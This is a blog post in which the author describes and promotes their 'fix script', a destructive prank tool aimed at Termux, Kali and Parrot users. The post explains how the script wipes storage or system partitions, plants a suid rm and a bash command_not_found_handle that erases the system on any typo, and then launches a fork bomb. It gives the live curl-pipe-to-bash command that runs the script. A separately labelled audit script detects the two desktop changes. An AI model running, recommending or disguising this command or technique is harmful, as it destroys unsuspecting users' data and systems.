Why the fix script?

Last updated: 2020-04-30

What is the fix script?

The fix script is a script I wrote long ago to... well, not to fix systems, though that kind of depends on your point of view. It is mainly targeted at Termux/Kali/Parrot users and, in a nutshell, it hoses their system. Technically, if they go to a regular distribution at that point, it does fix the crux of the problem. And that problem is script kiddies, aka skids. There is no reason whatsoever to be running a pentesting distribution if you don't know how Linux works and are too naive to think twice before running the script of a random guy on the intertubes. And it is usually posted in response to some kind of very stupid question, when it is already very clear that the person in question is a skid. Maybe it could be considered like GIF, a kind of inside joke / slang among many of the hackers on Telegram, in practice having a similar shock factor.

The fix script has 3 modes of operation - unrooted Termux, rooted Termux, and desktop Linux (limited to Parrot and Kali, bailing out otherwise). So essentially all the skid systems out there.
In unrooted Termux mode it asks for storage permission to gain access to the files on the SD card partition. Then it removes everything there. It's about all the havoc the fix script can wreak in this mode, but still sufficient to do the job.
In rooted Termux mode it uses this access to remount / and /system read-write (to deal with both the older as well as the new SAR-enabled systems) and hoses the whole system. The result is that reflashing the system from the recovery is necessary.
In desktop Linux mode things are a little more subtle. It asks for sudo permission to mark the rm binary as suid (chmod +s). What this does is enable the rm binary to be run with root privileges while *not* requiring any authorization. This is important for the next thing it does, modifying the command_not_found_handle function in bash (this is intentional as this script does not seek to target people running other "aftermarket" shells). Whenever a wrong command is entered, this function gets executed by the shell. It's basically how Suicide Linux works too. When a wrong command is entered, a message "lmao retard" will be shown and the system will be hosed. Now if sudo were to be used here, obviously anyone would bail out straight away. But that's the thing - at that point rm doesn't require that anymore. So it hoses the system without needing any interaction. I think that's pretty neat.
Additionally, in all these modes a fork bomb is executed afterwards. So if you hear stories of the phone becoming unresponsive, you can be pretty confident that all their data is successfully hosed too.
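
The two desktop Linux mode changes described above (a suid bit on rm and a modified command_not_found_handle) can be checked for with a short audit. This is an added example, not part of the fix script or the original page; the utilities listed besides rm and the startup-file paths are assumptions.

```shell
#!/bin/sh
# Added example: audit for the two desktop-mode changes described above.

# Succeeds if the file carries the setuid or setgid bit.
has_suid_sgid() {
    [ -u "$1" ] || [ -g "$1" ]
}

# Report each listed utility that is setuid/setgid. Bare names are resolved
# on PATH; arguments containing "/" are taken as paths.
audit_suid() {
    for name in "$@"; do
        case "$name" in
            */*) path=$name ;;
            *)   path=$(command -v "$name" 2>/dev/null) || continue ;;
        esac
        if has_suid_sgid "$path"; then
            printf 'SUID/SGID set on %s (clear with: chmod u-s,g-s %s)\n' "$path" "$path"
        fi
    done
}

# Print file:line:text for every mention of command_not_found_handle in the
# given startup files. Review hits rather than deleting them blindly: some
# distributions ship a legitimate handler that suggests packages.
find_cnf_handlers() {
    for rc in "$@"; do
        if [ -f "$rc" ]; then
            grep -n 'command_not_found_handle' "$rc" /dev/null || true
        fi
    done
}

# Assumed utility list and startup-file paths; adjust for the system at hand.
audit_suid rm mv cp dd chmod chown
find_cnf_handlers /etc/bash.bashrc /etc/profile \
    "$HOME/.bashrc" "$HOME/.bash_profile" "$HOME/.profile"
```

In an interactive bash session, `declare -f command_not_found_handle` prints the handler that is currently loaded, whichever file it came from.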

The command to run the fix script would be this:
curl -sL ghnou.su/fix.sh | bash -
Note that the -L parameter is only there to make curl follow redirects (such as HTTPS upgrades which are a 301 type redirect). If https:// is prepended to the URL, this option is not needed. Personally I just prefer not prepending it when curl can do the same given some assistance (though honestly it should treat HTTPS upgrades differently from other redirects, but I digress).

Why does it exist?

At this point a question should be asked - is this evil? And of course the answer is yes. Is it borderline malware? Arguably. Does it fulfill a function? Honestly I would say so. It makes these skids less gullible and hopefully enables them to reconsider whether they should really hack that Facebook account. And it could be said that it's a next-generation version of the rm -rf /* command that's floated around on the interwebs for decades. This is nothing new, but of course at this point improved and more targeted at the kind of systems that matter most. Finally you could argue that the people running it were themselves already up to no good - looking to "hack a victim". Except they became the victim themselves. Par for the course imo. But that depends on your moral compass and perhaps your sense of inclusivity.

Another thing that could be noted is that... actually, developers in particular seem to like it a lot, many sharing the same frustrations with skids that I do. The fix script now leads a life of its own in a way, being included in other repositories, a note in the official offtopic chat for ParrotOS by one of the project developers, and so on. At the time of writing one of my friends who's an Android developer is contemplating whether to write a native Android app (now hosted here, source here and here) for it, pretty cool! And now even a Windows version of the fix script exists here with source here. I like how the fix script is growing into so much more than I could possibly do alone. If you're one of the aforementioned people, thank you! :D